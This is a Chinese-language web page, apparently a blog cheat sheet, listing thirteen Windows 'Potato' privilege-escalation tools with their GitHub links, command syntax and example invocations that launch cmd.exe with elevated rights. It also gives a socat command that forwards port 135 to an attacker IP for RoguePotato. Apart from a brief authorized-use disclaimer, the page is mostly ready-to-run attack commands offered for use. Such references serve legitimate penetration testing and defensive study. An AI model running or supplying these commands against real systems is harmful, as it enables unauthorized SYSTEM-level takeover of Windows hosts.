当前位置: 首页 > news >正文

Windows 提权工具(“Potato“ 系列)用法指南

以下是13种常见的 Windows 提权工具及其基本用法。请注意,这些工具仅应用于合法授权的渗透测试或安全研究环境中。

1. BadPotato

利用 Windows 服务中的权限提升漏洞。

https://github.com/BeichenDream/BadPotato

BadPotato.exe <cmd> [args]
  • 示例

    BadPotato.exe cmd.exe /c whoami > C:\temp\whoami.txt

2. CandyPotato

通过 LSASS 进程提权,适用于域环境。

https://github.com/klezVirus/CandyPotato

CandyPotato.exe -c <command>
  • 示例

    CandyPotato.exe -c "C:\Windows\System32\cmd.exe"

3. CoercedPotato

结合 SMB 中继和 NTLM 认证进行提权。

https://github.com/Prepouce/CoercedPotato

CoercedPotato.exe -cmd <command> -target <target>
  • 示例

    CoercedPotato.exe -cmd "C:\Windows\System32\cmd.exe" -target dc01.example.com

4. EfsPotato

利用 EFS(加密文件系统)服务中的漏洞。

https://github.com/zcgonvh/EfsPotato

EfsPotato.exe -c <command>
  • 示例

    EfsPotato.exe -c "C:\Windows\System32\cmd.exe"

5. GodPotato

支持多种提权方法,功能强大。

https://github.com/BeichenDream/GodPotato

GodPotato.exe -cmd <command>
  • 示例

    GodPotato.exe -cmd "C:\Windows\System32\cmd.exe"

6. JuicyPotatoNG

JuicyPotato 的增强版本,支持更多 CLSID。

https://github.com/antonioCoco/JuicyPotatoNG

JuicyPotatoNG.exe -l <local_port> -p <program> -a <arguments> -t <trigger_type>
  • 参数说明

    • -l:本地监听端口

    • -p:要执行的程序

    • -a:传递给程序的参数

    • -t:触发类型(* 表示尝试所有)

  • 示例

    JuicyPotatoNG.exe -l 1337 -p C:\Windows\System32\cmd.exe -t *

7. PetitPotato

轻量级提权工具,适用于资源受限环境。

https://github.com/wh0amitz/PetitPotato

PetitPotato.exe <command>
  • 示例

    PetitPotato.exe "C:\Windows\System32\cmd.exe"

8. PrintNotifyPotato

利用 Print Spooler 服务漏洞。

https://github.com/BeichenDream/PrintNotifyPotato

PrintNotifyPotato.exe -i -c <command>
  • 示例

    PrintNotifyPotato.exe -i -c "C:\Windows\System32\cmd.exe"

9. RasMan

利用 RAS (Remote Access Service) 服务漏洞。

https://github.com/crisprss/RasmanPotato

RasMan.exe -c <command>
  • 示例

    RasMan.exe -c "C:\Windows\System32\cmd.exe"

10. RoguePotato

需要配合远程重定向器使用。

https://github.com/antonioCoco/RoguePotato

RoguePotato.exe -r <redirector_ip> -e <command> -l <local_port>
  • 示例

    RoguePotato.exe -r 192.168.1.100 -e "C:\Windows\System32\cmd.exe" -l 9999

11. SweetPotato

通过 DCOM 和 LSASS 进程提权。

https://github.com/CCob/SweetPotato

SweetPotato.exe -c <command>
  • 示例

    SweetPotato.exe -c "C:\Windows\System32\cmd.exe"

12.MultiPotato 提权工具用法

MultiPotato 是一个集成了多种提权技术的多功能工具,它会自动尝试不同的提权方法,直到找到一个可行的方法。这是在现代 Windows 系统上进行权限提升的有效工具。

https://github.com/S3cur3Th1sSh1t/MultiPotato

基本用法
MultiPotato.exe -c <command>
  • 参数说明
    • -c:要执行的命令或程序
    • -h:显示帮助信息
    • -v:显示详细输出
13. JuicyPotato(原版本)

经典的提权工具。

JuicyPotato.exe -l <local_port> -p <program> -a <arguments> -t <trigger_type>
  • 示例

    JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\temp\whoami.txt" -t *

使用建议

  1. 准备工作

    • 确保目标系统上的防火墙允许相关通信

    • 确认目标系统的 Windows 版本和补丁状态

    • 准备好要执行的命令或程序

  2. 网络提权工具:对于需要远程协助的工具(如 RoguePotato),在攻击机上启动重定向器:

    socat tcp-listen:135,reuseaddr,fork tcp:<attacker_ip>:<local_port>

  3. 测试执行:先用简单命令测试提权是否成功:

    tool_name.exe -c "cmd /c whoami > C:\temp\whoami.txt"

  4. 替代方案:如果一种工具失败,尝试其他工具或组合使用。

  5. 合法使用:所有操作必须在获得明确授权的环境中进行。

http://www.xdnf.cn/news/1001467.html

相关文章:

  • 火线、零线、地线 基础知识
  • 实现图片懒加载
  • 大话软工笔记—架构的概要设计
  • 【AS32系列MCU调试教程】基础配置:Eclipse项目与工具链的优化
  • SD-WAN优化云应用与多云架构访问的关键策略
  • 408考研逐题详解:2009年第39题
  • 深入探索IIC-OLED显示技术:嵌入式仿真平台如何重塑高校教学范式——深圳航天科技创新研究院技术赋能新一代工程教育
  • 观点 | 科技企业到了品牌建设的历史性窗口期
  • 界面开发框架DevExpress XAF实践:集成.NET Aspire后如何实现服务安排?
  • Kratos 与Golang Cms的关系
  • 深度学习环境搭建(pycharm+yolov5)
  • 【AWS入门】IAM多重身份验证(MFA)简介
  • 深度解析Git错误:`fatal: detected dubious ownership in repository` 的根源与解决方案
  • OpenAI API:LLM编程的事实标准(上)
  • R语言缓释制剂QBD解决方案之五
  • GitLab 拉取变慢的原因及排查方法
  • UE5 学习系列(九)光照系统介绍
  • linux中的locate命令
  • Vue3+TypeScript实现状态模式
  • cuda编程笔记(3)--常量内存与事件
  • 嘉立创EDA初识
  • 外资车全面反弹,被看衰的日系车尤其凶猛,国产电车再承压
  • 智慧园区可视化怎么做?
  • 快速排序优化技巧详解:提升性能的关键策略
  • Python爬虫实战:研究AutobahnPython相关技术
  • 股指期货为什么会出现贴水现象?
  • Redis : set集合
  • 使用 Visual Studio 2019 修改 WebRTC 源码
  • SpringCloud微服务:服务保护和分布式事务
  • Vosk API:开源离线语音识别的强大工具